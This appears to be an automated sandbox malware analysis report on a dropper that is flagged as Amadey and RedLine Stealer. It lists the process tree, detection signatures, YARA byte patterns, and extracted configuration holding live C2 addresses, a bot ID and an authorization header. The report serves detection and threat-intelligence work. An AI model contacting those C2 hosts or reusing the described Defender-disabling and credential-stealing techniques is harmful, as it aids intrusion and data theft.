Edit tour

Windows Analysis Report
d3HccaLUT7.exe

Overview

General Information

Sample Name:	d3HccaLUT7.exe
Original Sample Name:	d226c85940774672726af5fb360fc1de.exe
Analysis ID:	829684
MD5:	d226c85940774672726af5fb360fc1de
SHA1:	ed5fdad6f3c74fdfb5387668235100f48ba6a232
SHA256:	113b3ee1d70fe7111ea748cad0ec0f8f560d9003474d2bacaea6650fc961ddf7
Tags:	exeRedLineStealer
Infos:

Detection

Amadey, RedLine

Score:	93
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected RedLine Stealer

Yara detected Amadeys stealer DLL

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Detected unpacking (overwrites its own PE header)

Detected unpacking (changes PE section rights)

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Disable Windows Defender real time protection (registry)

Machine Learning detection for sample

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Disable Windows Defender notifications (registry)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Found potential string decryption / allocating functions

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Found evasive API chain (may stop execution after checking a module file name)

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

PE file contains executable resources (Code or Archives)

Contains long sleeps (>= 3 min)

Enables debug privileges

Sample file is different than original file name gathered from version info

Drops PE files

Contains functionality to read the PEB

Found evasive API chain checking for process token information

Binary contains a suspicious time stamp

Dropped file seen in connection with other malware

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64

d3HccaLUT7.exe (PID: 6356 cmdline: C:\Users\user\Desktop\d3HccaLUT7.exe MD5: D226C85940774672726AF5FB360FC1DE)

kino0095.exe (PID: 6372 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe MD5: 566C1099548DF136503F4DC814D54B17)

kino2456.exe (PID: 6392 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe MD5: EBD95183957BECDB18025FC9D553B15E)

kino0588.exe (PID: 6412 cmdline: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe MD5: 54A8FD200F50B6AF0F10CA6EB68471D3)

bus9402.exe (PID: 6428 cmdline: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe MD5: 7E93BACBBC33E6652E147E7FE07572A0)

con1332.exe (PID: 6616 cmdline: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe MD5: 0B63FCA2981CA840B845011956E212AD)

rundll32.exe (PID: 6492 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)

rundll32.exe (PID: 6644 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)

rundll32.exe (PID: 6684 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)

rundll32.exe (PID: 6792 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP003.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about 500$ on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://asec.ahnlab.com/en/41450/ https://blog.minerva-labs.com/underminer-exploit-kit-the-more-you-check-the-more-evasive-you-become https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html https://blogs.blackberry.com/en/2020/01/threat-spotlight-amadey-bot https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/ https://bartblaze.blogspot.com/2021/06/digital-artists-targeted-in-redline.html https://blog.chainalysis.com/reports/2022-crypto-crime-report-preview-malware/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: Amadey

{"C2 url": "31.41.244.200/games/category/index.php", "Version": "3.68"}

Threatname: RedLine

{"C2 url": "193.233.20.30:4125", "Bot Id": "relon", "Authorization Header": "17da69809725577b595e217ba006b869"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge821663.exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Local\Temp\IXP001.TMP\en675431.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\IXP001.TMP\en675431.exe	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1a434:$pat14: , CommandLine: 0x134a7:$v2_1: ListOfProcesses 0x13286:$v4_3: base64str 0x13dff:$v4_4: stringKey 0x11b63:$v4_5: BytesToStringConverted 0x10d76:$v4_6: FromBase64 0x12098:$v4_8: procName 0x12811:$v5_5: FileScanning 0x11d6c:$v5_7: RecordHeaderField 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000003.345850863.0000000002C50000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000006.00000003.345850863.0000000002C50000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
00000000.00000002.392209330.00000000067B0000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000006.00000002.370660080.0000000002DA6000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1690:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000001.00000003.308943613.00000000050B2000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000006.00000002.369924235.0000000000400000.00000040.00000001.01000000.0000000A.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000006.00000002.369924235.0000000000400000.00000040.00000001.01000000.0000000A.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000006.00000002.370376252.0000000002C20000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000006.00000002.370376252.0000000002C20000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000003.307856775.0000000006F97000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.392398994.0000000006A30000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.con1332.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
6.2.con1332.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
6.2.con1332.exe.2c20e67.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
6.2.con1332.exe.2c20e67.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
1.3.kino0095.exe.5160220.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.3.kino0095.exe.5160220.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x18834:$pat14: , CommandLine: 0x118a7:$v2_1: ListOfProcesses 0x11686:$v4_3: base64str 0x121ff:$v4_4: stringKey 0xff63:$v4_5: BytesToStringConverted 0xf176:$v4_6: FromBase64 0x10498:$v4_8: procName 0x10c11:$v5_5: FileScanning 0x1016c:$v5_7: RecordHeaderField 0xfe34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
0.3.d3HccaLUT7.exe.7068a20.1.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.3.d3HccaLUT7.exe.7068a20.1.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
6.2.con1332.exe.400000.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
6.2.con1332.exe.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
6.3.con1332.exe.2c50000.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
6.3.con1332.exe.2c50000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
1.3.kino0095.exe.5160220.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.3.kino0095.exe.5160220.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1a434:$pat14: , CommandLine: 0x134a7:$v2_1: ListOfProcesses 0x13286:$v4_3: base64str 0x13dff:$v4_4: stringKey 0x11b63:$v4_5: BytesToStringConverted 0x10d76:$v4_6: FromBase64 0x12098:$v4_8: procName 0x12811:$v5_5: FileScanning 0x11d6c:$v5_7: RecordHeaderField 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
Click to see the 9 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: d3HccaLUT7.exe	Virustotal: Detection: 46%			Perma Link
Source: d3HccaLUT7.exe	ReversingLabs: Detection: 41%

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe	Avira: detection malicious, Label: HEUR/AGEN.1252166
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\en675431.exe	Avira: detection malicious, Label: HEUR/AGEN.1252166

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge821663.exe	ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge821663.exe	Virustotal: Detection: 79%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe	Virustotal: Detection: 57%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\en675431.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe	ReversingLabs: Detection: 88%

Machine Learning detection for sample

Source: d3HccaLUT7.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge821663.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\en675431.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Joe Sandbox ML: detected

Source: 00000001.00000003.308943613.00000000050B2000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: RedLine {"C2 url": "193.233.20.30:4125", "Bot Id": "relon", "Authorization Header": "17da69809725577b595e217ba006b869"}
Source: 0.3.d3HccaLUT7.exe.7068a20.1.unpack	Malware Configuration Extractor: Amadey {"C2 url": "31.41.244.200/games/category/index.php", "Version": "3.68"}

Source: C:\Users\user\Desktop\d3HccaLUT7.exe	Code function: 0_2_00402F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,	0_2_00402F1D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe	Code function: 1_2_00302F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,	1_2_00302F1D
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe	Code function: 2_2_00FC2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,	2_2_00FC2F1D
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe	Code function: 3_2_00B82F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,	3_2_00B82F1D

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\d3HccaLUT7.exe	Unpacked PE file: 0.2.d3HccaLUT7.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Unpacked PE file: 6.2.con1332.exe.400000.0.unpack

Source: d3HccaLUT7.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\d3HccaLUT7.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source:	Binary string: wextract.pdb source: d3HccaLUT7.exe, d3HccaLUT7.exe, 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, kino0095.exe, kino0095.exe, 00000001.00000003.308943613.00000000050B2000.00000004.00000020.00020000.00000000.sdmp, kino0095.exe, 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, kino2456.exe, kino2456.exe, 00000002.00000000.309335092.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, kino0588.exe, kino0588.exe, 00000003.00000000.310280030.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, kino0095.exe.0.dr, kino2456.exe.1.dr, kino0588.exe.2.dr
Source:	Binary string: Healer.pdb source: con1332.exe, 00000006.00000002.370856585.0000000004680000.00000004.08000000.00040000.00000000.sdmp, con1332.exe, 00000006.00000002.370894086.00000000046E0000.00000004.00000020.00020000.00000000.sdmp, con1332.exe, 00000006.00000002.370971517.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, con1332.exe, 00000006.00000003.346171315.0000000002DFF000.00000004.00000020.00020000.00000000.sdmp, con1332.exe, 00000006.00000002.371999193.00000000075A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: ge821663.exe.0.dr
Source:	Binary string: wextract.pdbGCTL source: d3HccaLUT7.exe, 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, kino0095.exe, 00000001.00000003.308943613.00000000050B2000.00000004.00000020.00020000.00000000.sdmp, kino0095.exe, 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, kino2456.exe, 00000002.00000000.309335092.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, kino0588.exe, 00000003.00000000.310280030.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, kino0095.exe.0.dr, kino2456.exe.1.dr, kino0588.exe.2.dr
Source:	Binary string: <C:\zarepot\talotoyuy1\guf.pdb source: dvL76s65.exe.2.dr
Source:	Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: kino0588.exe, 00000003.00000003.310724099.0000000004C24000.00000004.00000020.00020000.00000000.sdmp, bus9402.exe, 00000004.00000000.310959531.0000000000A82000.00000002.00000001.01000000.00000007.sdmp, bus9402.exe.3.dr
Source:	Binary string: C:\tugiwozexe-hon68\xozutuboreja.pdb source: kino0588.exe, 00000003.00000003.310724099.0000000004C24000.00000004.00000020.00020000.00000000.sdmp, con1332.exe, 00000006.00000000.344903620.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, con1332.exe.3.dr
Source:	Binary string: _.pdb source: con1332.exe, 00000006.00000002.370856585.0000000004680000.00000004.08000000.00040000.00000000.sdmp, con1332.exe, 00000006.00000002.370894086.00000000046E0000.00000004.00000020.00020000.00000000.sdmp, con1332.exe, 00000006.00000002.370971517.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, con1332.exe, 00000006.00000003.346171315.0000000002DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\zarepot\talotoyuy1\guf.pdb source: dvL76s65.exe.2.dr
Source:	Binary string: C:\sigizecem\xigago\tukonunoz_givizadi\yodawusafix\11\j.pdb source: d3HccaLUT7.exe
Source:	Binary string: Healer.pdbH5 source: con1332.exe, 00000006.00000002.370856585.0000000004680000.00000004.08000000.00040000.00000000.sdmp, con1332.exe, 00000006.00000002.370894086.00000000046E0000.00000004.00000020.00020000.00000000.sdmp, con1332.exe, 00000006.00000002.370971517.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, con1332.exe, 00000006.00000003.346171315.0000000002DFF000.00000004.00000020.00020000.00000000.sdmp, con1332.exe, 00000006.00000002.371999193.00000000075A0000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\d3HccaLUT7.exe	Code function: 0_2_00402390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_00402390
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe	Code function: 1_2_00302390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	1_2_00302390
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe	Code function: 2_2_00FC2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	2_2_00FC2390
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe	Code function: 3_2_00B82390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	3_2_00B82390

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 31.41.244.200/games/category/index.php
Source: Malware configuration extractor	URLs: 193.233.20.30:4125

Source: kino0095.exe, 00000001.00000003.308943613.00000000050B2000.00000004.00000020.00020000.00000000.sdmp, en675431.exe.1.dr

String found in binary or memory: https://api.ip.sb/ip

System Summary

Malicious sample detected (through community Yara rule)

Source: 6.2.con1332.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 6.2.con1332.exe.2c20e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 1.3.kino0095.exe.5160220.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 6.2.con1332.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 6.3.con1332.exe.2c50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 1.3.kino0095.exe.5160220.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000006.00000003.345850863.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000000.00000002.392209330.00000000067B0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000006.00000002.370660080.0000000002DA6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000006.00000002.369924235.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000006.00000002.370376252.0000000002C20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.392398994.0000000006A30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\en675431.exe, type: DROPPED	Matched rule: Detects RedLine infostealer Author: ditekSHen

Source: d3HccaLUT7.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 6.2.con1332.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 6.2.con1332.exe.2c20e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 1.3.kino0095.exe.5160220.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 6.2.con1332.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 6.3.con1332.exe.2c50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
